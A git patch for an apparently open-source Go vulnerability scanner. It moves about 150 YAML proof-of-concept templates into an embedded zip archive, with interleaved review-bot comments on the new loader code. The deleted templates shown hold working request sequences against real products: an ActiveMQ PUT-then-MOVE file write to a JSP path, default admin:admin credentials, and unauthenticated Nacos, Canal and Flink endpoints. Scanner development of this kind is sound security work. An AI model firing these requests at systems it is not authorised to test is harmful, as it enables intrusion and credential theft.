From 7095bd20be69af3b5acde11b5977f599d67c2f7c Mon Sep 17 00:00:00 2001 
From: "LAPTOP-VVINFKMQ\\JohnDoe" Date: Mon, 26 Jul 2021 11:15:39 +0800 Subject: [PATCH] =?UTF-8?q?=E4=BF=AE=E6=94=B9pocs=E5=8A=A0=E8=BD=BD?= =?UTF-8?q?=E4=B8=BAzip=E5=8E=8B=E7=BC=A9=E5=8C=85?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- WebScan/lib/http.pb.go | 57 ++++++++- WebScan/pocs/activemq-cve-2016-3088.yml | 34 ----- WebScan/pocs/activemq-default-password.yml | 16 --- WebScan/pocs/alibaba-canal-info-leak.yml | 12 -- WebScan/pocs/alibaba-nacos-api-unauth.yml | 15 --- WebScan/pocs/alibaba-nacos.yml | 13 -- WebScan/pocs/apache-flink-upload-rce.yml | 38 ------ ...fbiz-cve-2020-9496-xml-deserialization.yml | 19 --- WebScan/pocs/apache-solr-file-read.yml | 21 ---- .../pocs/apacheofbiz-cve-2018-8033-xxe.yml | 15 --- .../pocs/bt742-pma-unauthorized-access.yml | 11 -- WebScan/pocs/cisco-cve-2020-3452-readfile.yml | 11 -- WebScan/pocs/coremail-cnvd-2019-16798.yml | 12 -- WebScan/pocs/discuz-ml3x-cnvd-2019-22239.yml | 22 ---- WebScan/pocs/dlink-cve-2019-17506.yml | 14 --- ...link-cve-2020-25078-account-disclosure.yml | 12 -- .../dlink-cve-2020-9376-dump-credentials.yml | 15 --- WebScan/pocs/dlink-dcs-info-leak.yml | 9 -- WebScan/pocs/docker-api-unauthorized-rce.yml | 12 -- WebScan/pocs/docker-registry-api-unauth.yml | 16 --- WebScan/pocs/druid-monitor-unauth.yml | 10 -- WebScan/pocs/drupal-cve-2014-3704-sqli.yml | 14 --- WebScan/pocs/drupal-cve-2018-7600-rce.yml | 19 --- WebScan/pocs/drupal-cve-2018-7600-rce2.yml | 29 ----- WebScan/pocs/drupal-cve-2019-6340.yml | 33 ----- WebScan/pocs/drupal-drupal7geddon2-rce.yml | 28 ----- WebScan/pocs/drupal-drupal8geddon2-rce.yml | 20 --- WebScan/pocs/ecology-sqli.yml | 13 -- WebScan/pocs/ecology-validate-sqli.yml | 17 --- WebScan/pocs/ecology-workflowservicexml-2.yml | 20 --- WebScan/pocs/ecology-workflowservicexml.yml | 20 --- WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml | 13 -- WebScan/pocs/ecshop-rce.yml | 17 --- WebScan/pocs/ecshop-rce2.yml | 17 --- 
WebScan/pocs/elasticsearch-unauth.yml | 16 --- WebScan/pocs/exchange-cve-2021-26855-ssrf.yml | 14 --- WebScan/pocs/eyou-rce.yml | 15 --- WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml | 16 --- WebScan/pocs/fangweicms-sqli.yml | 13 -- .../finereport-v8-arbitrary-file-read.yml | 11 -- WebScan/pocs/flir-ax8-file-read.yml | 11 -- .../pocs/gitlab-cnvd-2021-14193-infoleak.yml | 15 --- WebScan/pocs/h3c-secparh-any-user-login.yml | 10 -- WebScan/pocs/hikvision-cve-2017-7921.yml | 11 -- WebScan/pocs/iis6.0-put.yml | 21 ---- WebScan/pocs/jboss-cve-2010-1871.yml | 15 --- WebScan/pocs/jboss-unauth.yml | 11 -- WebScan/pocs/jenkins-cve-2018-1000861-rce.yml | 14 --- WebScan/pocs/jenkins-unauthorized-access.yml | 21 ---- WebScan/pocs/jumpserver-unauth-rce.yml | 21 ---- WebScan/pocs/jumpserver-unauth-rce2.yml | 21 ---- WebScan/pocs/kingsoft-v8-default-password.yml | 12 -- WebScan/pocs/kingsoft-v8-file-read.yml | 12 -- .../pocs/landray-oa-custom-jsp-fileread-2.yml | 11 -- .../pocs/landray-oa-custom-jsp-fileread.yml | 11 -- WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml | 12 -- WebScan/pocs/laravel-debug-info-leak.yml | 11 -- WebScan/pocs/laravel-improper-webdir.yml | 11 -- WebScan/pocs/mongo-express-cve-2019-10758.yml | 21 ---- WebScan/pocs/netentsec-ngfw-rce.yml | 19 --- WebScan/pocs/nexus-cve-2019-7238.yml | 20 --- WebScan/pocs/nexus-cve-2020-10199.yml | 21 ---- WebScan/pocs/nexus-cve-2020-10204.yml | 20 --- WebScan/pocs/nexus-default-password.yml | 22 ---- ...pmyadmin-cve-2018-12613-file-inclusion.yml | 11 -- .../pocs/phpmyadmin-setup-deserialization.yml | 13 -- WebScan/pocs/phpstudy-backdoor-rce.yml | 19 --- .../pocs/poc-yaml-weblogic-console-weak.yml | 29 ----- WebScan/pocs/pocs.zip | Bin 0 -> 89914 bytes .../qizhi-fortressaircraft-unauthorized.yml | 12 -- WebScan/pocs/rockmongo-default-password.yml | 12 -- WebScan/pocs/ruijie-eg-info-leak.yml | 24 ---- WebScan/pocs/ruijie-eg-rce.yml | 29 ----- .../ruijie-nbr1300g-cli-password-leak.yml | 15 --- 
WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml | 20 --- WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml | 11 -- .../saltstack-cve-2021-25282-file-write.yml | 22 ---- .../sangfor-edr-arbitrary-admin-login.yml | 13 -- WebScan/pocs/sangfor-edr-cssp-rce.yml | 15 --- WebScan/pocs/sangfor-edr-tool-rce.yml | 14 --- WebScan/pocs/seeyon-a6-employee-info-leak.yml | 11 -- WebScan/pocs/seeyon-a6-test-jsp-sql.yml | 13 -- .../pocs/seeyon-ajax-unauthorized-access.yml | 16 --- .../pocs/seeyon-cnvd-2020-62422-readfile.yml | 11 -- WebScan/pocs/seeyon-session-leak.yml | 10 -- WebScan/pocs/seeyon-setextno-jsp-sql.yml | 13 -- WebScan/pocs/seeyon-unauthoried.yml | 19 --- WebScan/pocs/showdoc-uploadfile.yml | 25 ---- WebScan/pocs/solr-cve-2019-0193.yml | 30 ----- WebScan/pocs/solr-fileread1.yml | 25 ---- WebScan/pocs/solr-fileread2.yml | 25 ---- WebScan/pocs/solr-velocity-template-rce.yml | 38 ------ WebScan/pocs/sonicwall-ssl-vpn-rce.yml | 16 --- .../pocs/spring-actuator-heapdump-file.yml | 12 -- WebScan/pocs/spring-cloud-cve-2020-5405.yml | 15 --- WebScan/pocs/spring-cloud-cve-2020-5410.yml | 12 -- WebScan/pocs/spring-cve-2016-4977.yml | 15 --- WebScan/pocs/spring-heapdump-file.yml | 12 -- WebScan/pocs/springboot-env-unauth.yml | 9 -- WebScan/pocs/springboot-env-unauth2.yml | 9 -- WebScan/pocs/springcloud-cve-2019-3799.yml | 14 --- WebScan/pocs/struts2-045-1.yml | 15 --- WebScan/pocs/struts2-045-2.yml | 12 -- WebScan/pocs/struts2-046-1.yml | 16 --- WebScan/pocs/swagger-ui-unauth-No1.yml | 10 -- WebScan/pocs/swagger-ui-unauth-No2.yml | 10 -- WebScan/pocs/swagger-ui-unauth-No3.yml | 10 -- WebScan/pocs/swagger-ui-unauth-No4.yml | 10 -- WebScan/pocs/swagger-ui-unauth-No5.yml | 10 -- WebScan/pocs/swagger-ui-unauth-No6.yml | 10 -- WebScan/pocs/swagger-ui-unauth-No7.yml | 10 -- WebScan/pocs/swagger-ui-unauth-No8.yml | 10 -- WebScan/pocs/thinkadmin-v6-readfile.yml | 13 -- WebScan/pocs/thinkcmf-lfi.yml | 13 -- WebScan/pocs/thinkcmf-write-shell.yml | 18 --- WebScan/pocs/thinkphp-v6-file-write.yml | 26 
---- WebScan/pocs/thinkphp5-controller-rce.yml | 10 -- WebScan/pocs/thinkphp5023-method-rce.yml | 13 -- WebScan/pocs/tianqing-info-leak.yml | 9 -- WebScan/pocs/tomcat-cve-2017-12615-rce.yml | 22 ---- WebScan/pocs/tomcat-cve-2018-11759.yml | 16 --- WebScan/pocs/tomcat-manager-weak.yml | 31 ----- .../tongda-meeting-unauthorized-access.yml | 16 --- .../pocs/tongda-user-session-disclosure.yml | 16 --- .../ueditor-cnvd-2017-20077-file-upload.yml | 17 --- WebScan/pocs/vengd-upload-rce.yml | 25 ---- .../vmware-vcenter-arbitrary-file-read.yml | 11 -- .../vmware-vcenter-arbitrary-file-read2.yml | 11 -- .../vmware-vcenter-cve-2021-21985-rce.yml | 17 --- ...center-unauthorized-rce-cve-2021-21972.yml | 16 --- .../vmware-vrealize-cve-2021-21975-ssrf.yml | 15 --- .../pocs/weaver-ebridge-file-read-linux.yml | 19 --- .../pocs/weaver-ebridge-file-read-windows.yml | 19 --- .../pocs/weaver-oa-arbitrary-file-upload.yml | 24 ---- WebScan/pocs/weblogic-cve-2020-14750.yml | 12 -- WebScan/pocs/weblogic-ssrf.yml | 11 -- WebScan/pocs/weblogic-v10-cve-2017-10271.yml | 20 --- WebScan/pocs/weblogic-v12-cve-2019-2725.yml | 20 --- WebScan/pocs/webmin-cve-2019-15107-rce.yml | 18 --- .../wordpress-cve-2019-19985-infoleak.yml | 11 -- .../wordpress-ext-adaptive-images-lfi.yml | 13 -- WebScan/pocs/wordpress-ext-mailpress-rce.yml | 23 ---- .../yongyou-erp-nc-directory-traversal.yml | 10 -- WebScan/pocs/yongyou-u8-oa-sqli.yml | 13 -- WebScan/pocs/yonyou-grp-u8-sqli-to-rce.yml | 16 --- WebScan/pocs/yonyou-grp-u8-sqli.yml | 15 --- .../yonyou-nc6.5-arbitrary-file-upload.yml | 26 ---- WebScan/pocs/zabbix-authentication-bypass.yml | 11 -- WebScan/pocs/zabbix-cve-2016-10134-sqli.yml | 14 --- go.mod | 17 +-- go.sum | 119 +++++++++++++++--- 151 files changed, 169 insertions(+), 2412 deletions(-) delete mode 100644 WebScan/pocs/activemq-cve-2016-3088.yml delete mode 100644 WebScan/pocs/activemq-default-password.yml delete mode 100644 WebScan/pocs/alibaba-canal-info-leak.yml delete mode 100644 
WebScan/pocs/alibaba-nacos-api-unauth.yml delete mode 100644 WebScan/pocs/alibaba-nacos.yml delete mode 100644 WebScan/pocs/apache-flink-upload-rce.yml delete mode 100644 WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml delete mode 100644 WebScan/pocs/apache-solr-file-read.yml delete mode 100644 WebScan/pocs/apacheofbiz-cve-2018-8033-xxe.yml delete mode 100644 WebScan/pocs/bt742-pma-unauthorized-access.yml delete mode 100644 WebScan/pocs/cisco-cve-2020-3452-readfile.yml delete mode 100644 WebScan/pocs/coremail-cnvd-2019-16798.yml delete mode 100644 WebScan/pocs/discuz-ml3x-cnvd-2019-22239.yml delete mode 100644 WebScan/pocs/dlink-cve-2019-17506.yml delete mode 100644 WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml delete mode 100644 WebScan/pocs/dlink-cve-2020-9376-dump-credentials.yml delete mode 100644 WebScan/pocs/dlink-dcs-info-leak.yml delete mode 100644 WebScan/pocs/docker-api-unauthorized-rce.yml delete mode 100644 WebScan/pocs/docker-registry-api-unauth.yml delete mode 100644 WebScan/pocs/druid-monitor-unauth.yml delete mode 100644 WebScan/pocs/drupal-cve-2014-3704-sqli.yml delete mode 100644 WebScan/pocs/drupal-cve-2018-7600-rce.yml delete mode 100644 WebScan/pocs/drupal-cve-2018-7600-rce2.yml delete mode 100644 WebScan/pocs/drupal-cve-2019-6340.yml delete mode 100644 WebScan/pocs/drupal-drupal7geddon2-rce.yml delete mode 100644 WebScan/pocs/drupal-drupal8geddon2-rce.yml delete mode 100644 WebScan/pocs/ecology-sqli.yml delete mode 100644 WebScan/pocs/ecology-validate-sqli.yml delete mode 100644 WebScan/pocs/ecology-workflowservicexml-2.yml delete mode 100644 WebScan/pocs/ecology-workflowservicexml.yml delete mode 100644 WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml delete mode 100644 WebScan/pocs/ecshop-rce.yml delete mode 100644 WebScan/pocs/ecshop-rce2.yml delete mode 100644 WebScan/pocs/elasticsearch-unauth.yml delete mode 100644 WebScan/pocs/exchange-cve-2021-26855-ssrf.yml delete mode 100644 WebScan/pocs/eyou-rce.yml delete mode 
100644 WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml delete mode 100644 WebScan/pocs/fangweicms-sqli.yml delete mode 100644 WebScan/pocs/finereport-v8-arbitrary-file-read.yml delete mode 100644 WebScan/pocs/flir-ax8-file-read.yml delete mode 100644 WebScan/pocs/gitlab-cnvd-2021-14193-infoleak.yml delete mode 100644 WebScan/pocs/h3c-secparh-any-user-login.yml delete mode 100644 WebScan/pocs/hikvision-cve-2017-7921.yml delete mode 100644 WebScan/pocs/iis6.0-put.yml delete mode 100644 WebScan/pocs/jboss-cve-2010-1871.yml delete mode 100644 WebScan/pocs/jboss-unauth.yml delete mode 100644 WebScan/pocs/jenkins-cve-2018-1000861-rce.yml delete mode 100644 WebScan/pocs/jenkins-unauthorized-access.yml delete mode 100644 WebScan/pocs/jumpserver-unauth-rce.yml delete mode 100644 WebScan/pocs/jumpserver-unauth-rce2.yml delete mode 100644 WebScan/pocs/kingsoft-v8-default-password.yml delete mode 100644 WebScan/pocs/kingsoft-v8-file-read.yml delete mode 100644 WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml delete mode 100644 WebScan/pocs/landray-oa-custom-jsp-fileread.yml delete mode 100644 WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml delete mode 100644 WebScan/pocs/laravel-debug-info-leak.yml delete mode 100644 WebScan/pocs/laravel-improper-webdir.yml delete mode 100644 WebScan/pocs/mongo-express-cve-2019-10758.yml delete mode 100644 WebScan/pocs/netentsec-ngfw-rce.yml delete mode 100644 WebScan/pocs/nexus-cve-2019-7238.yml delete mode 100644 WebScan/pocs/nexus-cve-2020-10199.yml delete mode 100644 WebScan/pocs/nexus-cve-2020-10204.yml delete mode 100644 WebScan/pocs/nexus-default-password.yml delete mode 100644 WebScan/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml delete mode 100644 WebScan/pocs/phpmyadmin-setup-deserialization.yml delete mode 100644 WebScan/pocs/phpstudy-backdoor-rce.yml delete mode 100644 WebScan/pocs/poc-yaml-weblogic-console-weak.yml create mode 100644 WebScan/pocs/pocs.zip delete mode 100644 WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml delete 
mode 100644 WebScan/pocs/rockmongo-default-password.yml delete mode 100644 WebScan/pocs/ruijie-eg-info-leak.yml delete mode 100644 WebScan/pocs/ruijie-eg-rce.yml delete mode 100644 WebScan/pocs/ruijie-nbr1300g-cli-password-leak.yml delete mode 100644 WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml delete mode 100644 WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml delete mode 100644 WebScan/pocs/saltstack-cve-2021-25282-file-write.yml delete mode 100644 WebScan/pocs/sangfor-edr-arbitrary-admin-login.yml delete mode 100644 WebScan/pocs/sangfor-edr-cssp-rce.yml delete mode 100644 WebScan/pocs/sangfor-edr-tool-rce.yml delete mode 100644 WebScan/pocs/seeyon-a6-employee-info-leak.yml delete mode 100644 WebScan/pocs/seeyon-a6-test-jsp-sql.yml delete mode 100644 WebScan/pocs/seeyon-ajax-unauthorized-access.yml delete mode 100644 WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml delete mode 100644 WebScan/pocs/seeyon-session-leak.yml delete mode 100644 WebScan/pocs/seeyon-setextno-jsp-sql.yml delete mode 100644 WebScan/pocs/seeyon-unauthoried.yml delete mode 100644 WebScan/pocs/showdoc-uploadfile.yml delete mode 100644 WebScan/pocs/solr-cve-2019-0193.yml delete mode 100644 WebScan/pocs/solr-fileread1.yml delete mode 100644 WebScan/pocs/solr-fileread2.yml delete mode 100644 WebScan/pocs/solr-velocity-template-rce.yml delete mode 100644 WebScan/pocs/sonicwall-ssl-vpn-rce.yml delete mode 100644 WebScan/pocs/spring-actuator-heapdump-file.yml delete mode 100644 WebScan/pocs/spring-cloud-cve-2020-5405.yml delete mode 100644 WebScan/pocs/spring-cloud-cve-2020-5410.yml delete mode 100644 WebScan/pocs/spring-cve-2016-4977.yml delete mode 100644 WebScan/pocs/spring-heapdump-file.yml delete mode 100644 WebScan/pocs/springboot-env-unauth.yml delete mode 100644 WebScan/pocs/springboot-env-unauth2.yml delete mode 100644 WebScan/pocs/springcloud-cve-2019-3799.yml delete mode 100644 WebScan/pocs/struts2-045-1.yml delete mode 100644 WebScan/pocs/struts2-045-2.yml delete mode 100644 
WebScan/pocs/struts2-046-1.yml delete mode 100644 WebScan/pocs/swagger-ui-unauth-No1.yml delete mode 100644 WebScan/pocs/swagger-ui-unauth-No2.yml delete mode 100644 WebScan/pocs/swagger-ui-unauth-No3.yml delete mode 100644 WebScan/pocs/swagger-ui-unauth-No4.yml delete mode 100644 WebScan/pocs/swagger-ui-unauth-No5.yml delete mode 100644 WebScan/pocs/swagger-ui-unauth-No6.yml delete mode 100644 WebScan/pocs/swagger-ui-unauth-No7.yml delete mode 100644 WebScan/pocs/swagger-ui-unauth-No8.yml delete mode 100644 WebScan/pocs/thinkadmin-v6-readfile.yml delete mode 100644 WebScan/pocs/thinkcmf-lfi.yml delete mode 100644 WebScan/pocs/thinkcmf-write-shell.yml delete mode 100644 WebScan/pocs/thinkphp-v6-file-write.yml delete mode 100644 WebScan/pocs/thinkphp5-controller-rce.yml delete mode 100644 WebScan/pocs/thinkphp5023-method-rce.yml delete mode 100644 WebScan/pocs/tianqing-info-leak.yml delete mode 100644 WebScan/pocs/tomcat-cve-2017-12615-rce.yml delete mode 100644 WebScan/pocs/tomcat-cve-2018-11759.yml delete mode 100644 WebScan/pocs/tomcat-manager-weak.yml delete mode 100644 WebScan/pocs/tongda-meeting-unauthorized-access.yml delete mode 100644 WebScan/pocs/tongda-user-session-disclosure.yml delete mode 100644 WebScan/pocs/ueditor-cnvd-2017-20077-file-upload.yml delete mode 100644 WebScan/pocs/vengd-upload-rce.yml delete mode 100644 WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml delete mode 100644 WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml delete mode 100644 WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml delete mode 100644 WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml delete mode 100644 WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml delete mode 100644 WebScan/pocs/weaver-ebridge-file-read-linux.yml delete mode 100644 WebScan/pocs/weaver-ebridge-file-read-windows.yml delete mode 100644 WebScan/pocs/weaver-oa-arbitrary-file-upload.yml delete mode 100644 WebScan/pocs/weblogic-cve-2020-14750.yml delete mode 100644 
WebScan/pocs/weblogic-ssrf.yml delete mode 100644 WebScan/pocs/weblogic-v10-cve-2017-10271.yml delete mode 100644 WebScan/pocs/weblogic-v12-cve-2019-2725.yml delete mode 100644 WebScan/pocs/webmin-cve-2019-15107-rce.yml delete mode 100644 WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml delete mode 100644 WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml delete mode 100644 WebScan/pocs/wordpress-ext-mailpress-rce.yml delete mode 100644 WebScan/pocs/yongyou-erp-nc-directory-traversal.yml delete mode 100644 WebScan/pocs/yongyou-u8-oa-sqli.yml delete mode 100644 WebScan/pocs/yonyou-grp-u8-sqli-to-rce.yml delete mode 100644 WebScan/pocs/yonyou-grp-u8-sqli.yml delete mode 100644 WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml delete mode 100644 WebScan/pocs/zabbix-authentication-bypass.yml delete mode 100644 WebScan/pocs/zabbix-cve-2016-10134-sqli.yml diff --git a/WebScan/lib/http.pb.go b/WebScan/lib/http.pb.go index 1c36c53..51ba410 100644 --- a/WebScan/lib/http.pb.go +++ b/WebScan/lib/http.pb.go @@ -4,10 +4,14 @@ package lib import ( + "bytes" + "archive/zip" "embed" fmt "fmt" proto "github.com/golang/protobuf/proto" "gopkg.in/yaml.v3" + "io/ioutil" + "log" math "math" "strings" ) @@ -393,7 +397,28 @@ func LoadMultiPoc(Pocs embed.FS, pocname string) []*Poc { func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) { p := &Poc{} - yamlFile, err := Pocs.ReadFile("pocs/" + fileName) + + zByte, err := Pocs.ReadFile("pocs/pocs.zip") + zipReader, err := zip.NewReader(bytes.NewReader(zByte), int64(len(zByte))) + if err != nil { + log.Fatal(err) + } + var unzippedFileBytes []byte + // Read all the files from zip archive + for _, zipFile := range zipReader.File { + if zipFile.Name == fileName { + unzippedFileBytes, err = readZipFile(zipFile) + if err != nil { + log.Println(err) + continue + } + break + } + + } + yamlFile := unzippedFileBytes + + //yamlFile, err := Pocs.ReadFile("pocs/" + fileName) if err != nil { return nil, err 
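Review bot: The imports added to the `import (` block (`bytes`, `archive/zip`, `io/ioutil`, `log`) serve hand-written loader code in a file whose name and existing `proto`/`math` imports suggest protoc-gen-go output. If http.pb.go is in fact generated, regenerating it would presumably drop the loader along with these imports, so the loader would be safer in its own file in package lib. Within the block, `"archive/zip"` should come before `"bytes"` to stay gofmt-clean. `io/ioutil` is deprecated as of Go 1.16, which the existing `embed` import already requires, so `io` can be imported instead.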
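Review bot: The error returned by `Pocs.ReadFile("pocs/pocs.zip")` in loadPoc is never examined, because the next statement reassigns `err` from `zip.NewReader`. A bad archive then terminates the whole process through `log.Fatal(err)` even though loadPoc has an error return; the same two statements are repeated in the SelectPoc hunk that follows. When no entry has `Name == fileName`, `unzippedFileBytes` and `err` both stay nil, so the code after the hunk (not visible here) receives empty input rather than a not-found error. The rewrite below checks each call, returns the error to the caller, reports a missing entry explicitly and drops the commented-out `ReadFile` line. Parsing the archive once instead of on every call would be a further improvement, and loadPoc's body continues outside the hunk.

```go
func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
	p := &Poc{}

	zByte, err := Pocs.ReadFile("pocs/pocs.zip")
	if err != nil {
		return nil, err
	}
	zipReader, err := zip.NewReader(bytes.NewReader(zByte), int64(len(zByte)))
	if err != nil {
		return nil, err
	}

	var yamlFile []byte
	found := false
	for _, zipFile := range zipReader.File {
		if zipFile.Name != fileName {
			continue
		}
		if yamlFile, err = readZipFile(zipFile); err != nil {
			return nil, err
		}
		found = true
		break
	}
	if !found {
		return nil, fmt.Errorf("poc %q not found in pocs.zip", fileName)
	}
	// … unchanged: error check and YAML decoding of yamlFile …
```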
@@ -406,6 +431,23 @@ func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) { } func SelectPoc(Pocs embed.FS, pocname string) []string { + + + zByte, err := Pocs.ReadFile("pocs/pocs.zip") + zipReader, err := zip.NewReader(bytes.NewReader(zByte), int64(len(zByte))) + if err != nil { + log.Fatal(err) + } + var foundFiles []string + // Read all the files from zip archive + for _, entry := range zipReader.File { + if strings.Contains(entry.Name, pocname){ + foundFiles = append(foundFiles, entry.Name) + } + + } + + /* entries, err := Pocs.ReadDir("pocs") if err != nil { fmt.Println(err) @@ -416,5 +458,18 @@ func SelectPoc(Pocs embed.FS, pocname string) []string { foundFiles = append(foundFiles, entry.Name()) } } + + */ return foundFiles } + + + +func readZipFile(zf *zip.File) ([]byte, error) { + f, err := zf.Open() + if err != nil { + return nil, err + } + defer f.Close() + return ioutil.ReadAll(f) +} \ No newline at end of file diff --git a/WebScan/pocs/activemq-cve-2016-3088.yml b/WebScan/pocs/activemq-cve-2016-3088.yml deleted file mode 100644 index 7b93f13..0000000 --- a/WebScan/pocs/activemq-cve-2016-3088.yml +++ /dev/null 
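Review bot: The new loop in SelectPoc tests `strings.Contains(entry.Name, pocname)` against the full in-archive path, so directory entries or a folder prefix inside pocs.zip, if the archive has any, would be matched and returned as PoC names. The `ReadDir` loop that is now commented out used the plain names of the embedded directory's entries. Adding `if entry.FileInfo().IsDir() { continue }` at the top of the loop body keeps directory entries out of `foundFiles`. The old implementation is kept inside a `/* … */` block that closes in the next hunk; it can be deleted, since version control already preserves it. SelectPoc's body ends in that next hunk.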
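Review bot: The added readZipFile returns `ioutil.ReadAll(f)` with no upper bound, so a single highly compressed entry is expanded into memory in full. The archive is embedded at build time, which limits control of it to whoever can change pocs.zip. But the diffstat lists it as an opaque 89914-byte binary replacing the YAML sources, so its contents are no longer visible in review. A cap such as `return io.ReadAll(io.LimitReader(f, maxPocSize))`, with `maxPocSize` a constant the project would choose and `io` imported in place of `io/ioutil`, bounds the read. The function also lacks a doc comment, for example `// readZipFile returns the decompressed contents of one archive entry.`, and the file now ends without a trailing newline.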
@@ -1,34 +0,0 @@ -name: poc-yaml-activemq-cve-2016-3088 -set: - filename: randomLowercase(6) - fileContent: randomLowercase(6) -rules: - - method: PUT - path: /fileserver/{{filename}}.txt - body: | - {{fileContent}} - expression: | - response.status == 204 - - method: GET - path: /admin/test/index.jsp - search: | - activemq.home=(?P.*?), - follow_redirects: false - expression: | - response.status == 200 - - method: MOVE - path: /fileserver/{{filename}}.txt - headers: - Destination: "file://{{home}}/webapps/api/{{filename}}.jsp" - follow_redirects: false - expression: | - response.status == 204 - - method: GET - path: /api/{{filename}}.jsp - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(fileContent)) -detail: - author: j4ckzh0u(https://github.com/j4ckzh0u) - links: - - https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088 diff --git a/WebScan/pocs/activemq-default-password.yml b/WebScan/pocs/activemq-default-password.yml deleted file mode 100644 index d9a7ef9..0000000 --- a/WebScan/pocs/activemq-default-password.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-activemq-default-password -rules: - - method: GET - path: /admin/ - expression: | - response.status == 401 && response.body.bcontains(b"Unauthorized") - - method: GET - path: /admin/ - headers: - Authorization: Basic YWRtaW46YWRtaW4= - expression: | - response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"

Broker

") -detail: - author: pa55w0rd(www.pa55w0rd.online/) - links: - - https://blog.csdn.net/ge00111/article/details/72765210 \ No newline at end of file diff --git a/WebScan/pocs/alibaba-canal-info-leak.yml b/WebScan/pocs/alibaba-canal-info-leak.yml deleted file mode 100644 index a51de57..0000000 --- a/WebScan/pocs/alibaba-canal-info-leak.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-alibaba-canal-info-leak -rules: - - method: GET - path: /api/v1/canal/config/1/1 - follow_redirects: false - expression: | - response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey") -detail: - author: Aquilao(https://github.com/Aquilao) - info: alibaba Canal info leak - links: - - https://my.oschina.net/u/4581879/blog/4753320 \ No newline at end of file diff --git a/WebScan/pocs/alibaba-nacos-api-unauth.yml b/WebScan/pocs/alibaba-nacos-api-unauth.yml deleted file mode 100644 index 52512fb..0000000 --- a/WebScan/pocs/alibaba-nacos-api-unauth.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-alibaba-nacos-api-unauth -rules: - - method: GET - path: /nacos/v1/auth/users?pageNo=1&pageSize=9 - headers: - User-Agent: Nacos-Server - follow_redirects: true - expression: | - response.content_type.contains("application/json") && response.body.bcontains(bytes("totalCount")) && response.body.bcontains(bytes("pagesAvailable")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password")) -detail: - author: AgeloVito - info: alibaba-nacos-api-unauth - login: nacos/nacos - links: - - https://blog.csdn.net/caiqiiqi/article/details/112005424 diff --git a/WebScan/pocs/alibaba-nacos.yml b/WebScan/pocs/alibaba-nacos.yml deleted file mode 100644 index 34a4407..0000000 --- a/WebScan/pocs/alibaba-nacos.yml +++ /dev/null 
@@ -1,13 +0,0 @@ -name: poc-yaml-alibaba-nacos -rules: - - method: GET - path: /nacos/ - follow_redirects: true - expression: | - response.body.bcontains(bytes("Nacos")) -detail: - author: AgeloVito - info: alibaba-nacos - login: nacos/nacos - links: - - https://blog.csdn.net/caiqiiqi/article/details/112005424 diff --git a/WebScan/pocs/apache-flink-upload-rce.yml b/WebScan/pocs/apache-flink-upload-rce.yml deleted file mode 100644 index 6be7ca6..0000000 --- a/WebScan/pocs/apache-flink-upload-rce.yml +++ /dev/null @@ -1,38 +0,0 @@ -name: poc-yaml-apache-flink-upload-rce -set: - r1: randomLowercase(8) - r2: randomLowercase(4) -rules: - - method: GET - path: /jars - follow_redirects: true - expression: > - response.status == 200 && response.content_type.contains("json") && - response.body.bcontains(b"address") && response.body.bcontains(b"files") - - method: POST - path: /jars/upload - headers: - Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 - body: |- - --8ce4b16b22b58894aa86c421e8759df3 - Content-Disposition: form-data; name="jarfile";filename="{{r2}}.jar" - Content-Type:application/octet-stream - - {{r1}} - --8ce4b16b22b58894aa86c421e8759df3-- - - follow_redirects: true - expression: > - response.status == 200 && response.content_type.contains("json") && - response.body.bcontains(b"success") && response.body.bcontains(bytes(r2)) - search: >- - (?P([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar)) - - method: DELETE - path: '/jars/{{filen}}' - follow_redirects: true - expression: | - response.status == 200 -detail: - author: timwhite - links: - - https://github.com/LandGrey/flink-unauth-rce diff --git a/WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml b/WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml deleted file mode 100644 index c6ca0a9..0000000 --- a/WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml +++ /dev/null 
